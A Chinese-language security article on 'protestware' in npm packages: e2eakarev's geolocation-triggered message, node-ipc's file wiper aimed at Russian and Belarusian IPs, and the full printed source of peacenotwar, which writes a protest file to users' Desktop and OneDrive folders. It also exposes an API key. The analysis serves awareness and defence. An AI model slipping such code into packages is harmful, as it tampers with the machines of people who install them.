战争期间抗议软件的崛起

在不断演变的网络安全威胁格局中，出现了一种令人不安的现象，挑战了传统恶意软件的概念。这就是“抗议软件”——一个让网络安全专家和个人都感到不寒而栗的术语。与传统恶意软件不同，抗议软件的设计目的不仅仅是利用漏洞或窃取敏感信息。相反，它利用其恶意意图来推进特定的意识形态或政治议程，使受害者陷入虚拟行动主义的交火中。

抗议软件示例

最近一个最引人注目的抗议软件样本来自npm（此处），这个著名的JavaScript存储库管理器。具体来说，名为e2eakarev的包实现了这种新兴恶意不需要软件的简单但重要的原型。一旦“受害者”通过npm install安装package.json，它会以下列方式驱动安装过程：

文件index.js在安装后过程中运行。index.js由以下代码实现：

1
2


// 代码内容：查询ipgeolocation.io（通过apikey: fa845b4108e34abe981624d400f18a5d）检查包是否在以色列安装
// 如果IP源地址匹配以色列IP代码库，则直接在控制台打印"PROTEST_MESSAGE"

基本上，它查询ipgeolocation.io（通过apikey: fa845b4108e34abe981624d400f18a5d）来检查包是否在以色列安装。如果IP源地址匹配以色列IP代码库，则直接在控制台打印"PROTEST_MESSAGE"。打印的消息在代码中（可在此处查看）如果您想阅读它。

并非所有抗议软件都一样

虽然e2eakarev是一个非破坏性的恶意软件，但许多其他抗议软件仍然表现得像擦除器（请查看此github存储库）。例如，node-ipc实现了一个很好的抗议软件，它会擦除受害者的文件。实际上，如果任何受害者使用俄罗斯或白俄罗斯的IP，他们所有的文件都将被完全擦除，并带有一个心形表情符号。在超时开始时手动设置25%的概率，使这件事看起来更像一个浮动错误而不是有意为之。这影响了从10.1.1到10.1.3之前的node-ipc包。从11.0.0版本开始，不再在此包的源代码中直接包含恶意代码。

然而，许多像peacenotwar（此处）这样的软件因其消息以及在外置驱动器甚至像OneDrive这样的网络驱动器上传播它们的能力而令人印象深刻。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


import fs from 'fs';
import find from './service/findFiles.js';
import read from './service/readFile.js';
import { homedir } from 'os';

var Desktops = `${homedir}/Desktop/`;
var OneDrive = `${homedir}/OneDrive/`;
var OneDriveDesktops = `${homedir}/OneDrive/Desktop/`;

var DesktopFileExists=find(Desktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveDesktopFileExists=find(OneDriveDesktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveFileExists=find(OneDrive,'WITH-LOVE-FROM-AMERICA.txt');

function deliverAPeacefulMessage(path,message){
    try{
        fs.writeFile(
            path, 
            message,
            function(err){
                //its all good
            }
        );
    }catch(err){
        //thats ok
    }
}

//let's be polite and only do this once.
//hopefully once is all it takes.
if(!DesktopFileExists?.length&&!OneDriveFileExists?.length&&!OneDriveDesktopFileExists?.length){
    var thinkaboutit='WITH-LOVE-FROM-AMERICA.txt';

    var WITH_LOVE_FROM_AMERICA=read(`./${thinkaboutit}`);

    deliverAPeacefulMessage(`${Desktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
    deliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
    deliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
}

var whatWeWant='♥';

export {
    whatWeWant as default,
    whatWeWant
}

此模块将在用户的桌面上添加一条和平消息，并且只有在尚不存在的情况下才会这样做，以保持礼貌。此包的受影响版本容易受到不良行为的影响。它会在用户的桌面和OneDrive上创建文件。

结论

在我们结束对2023年抗议软件领域的探索时，很明显网络威胁的格局正变得越来越复杂和微妙。这种独特形式的恶意软件的兴起凸显了网络安全挑战的动态性质，超越了传统的经济利益或数据盗窃动机。

技术与行动主义之间的共生关系催生了一个新的前沿领域，虚拟抗议以代码的形式表现出来，渗透系统以破坏和传播不和。虽然抗议软件背后的动机可能源于意识形态或政治信念，但其后果远远超出了数字领域。

随着个人和组织努力应对不断演变的威胁格局，调整策略并加强防御以应对这一新兴威胁至关重要。网络安全措施必须发展，不仅要涵盖数据隐私和系统完整性的传统关切，还要涵盖抗议软件引入的社会政治维度。

在持续对抗抗议软件的斗争中，知识仍然是我们最强大的武器。通过保持知情和积极主动，我们可以共同建立对这种独特网络威胁的弹性防御，确保为所有人创造一个更安全、更可靠的数字未来。